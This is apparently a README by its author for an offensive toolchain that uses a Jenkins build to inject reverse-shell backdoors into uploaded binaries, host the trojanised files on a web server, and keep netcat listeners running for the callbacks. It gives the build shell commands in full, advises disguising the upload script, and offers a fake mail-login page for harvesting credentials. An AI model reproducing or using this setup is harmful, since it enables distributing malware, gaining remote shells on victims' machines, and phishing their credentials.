Need a jenkins server running, on it make a build, this build needs to be paramatized with the following text pramaters
dir
Payload_Type
port
IP
binName
Usage: python abd.py $BINARY $PLACE TO UPLOAD / DOWNLOAD $PUT SCRIPT LOCATION $JENKINS URL $Jenkins token $Jenkins project location $0 for linux $not used yet, always 0 $Backdoor callback port $backdoor callback ip / domain name
##Jenkins configuration:
Standord jenkins build, easiest to change jenkins user to be same as www root if on save server (on ubuntu it is www-data, guide: http://blog.manula.org/2013/03/running-jenkins-under-different-user-in.html ) Need to edit the following in jenkins:
- Make it a pramatrised build with the following
- dir
- Payload_Type
- port (Note: For shell call back)
- IP (Note: For shell call back)
- binName
- Check allow simotaius builds
- Set allow remote triggred with a token
- add zombie qr to screenrc file (for me www-data was using /etc/screenrc)
- Build shell with following:
rp=$(expr 1024 + $BUILD_NUMBER) #make it a port that is non-reserved and non-taken, should exclude 8080 and a few others
echo $rp
cp /in/$dir .
backdoor -f $dir -P $rp -H $IP -s reverse_shell_tcp
cp backdoored/$dir /var/www/html/out/$dir
echo "\n------------\nIP:$cip\nPort:$rp\nBinary:$binName" >> /var/www/html/list_screens_go_to_what
## NEED SCREEN AND netcat-openbsd packages (sudo apt-get install netcat-openbsd) as default nc does not have the -k flag
screen -S L_$rp -dm "nc -lnvkp $rp"
##PHP Configuration:
I use apache2 with PHP5
sudo apt-get install apache2 libapache2-mod-php5 php5-cgi
move the put.php into /var/www/html/ and change the name to something that would not be susspisus
if you want there is a basic template for making it look like a mail login, with cred harvesting, move everything in mail/ to /var/www/html
edit /etc/apache2/sites-enabled/000-default.conf and add DirectoryIndex index.php to index.php
##To get shell back: nc -lnvp $Backdoor Port #wait for shell
For help email [email protected]
-- Robert Hartshorn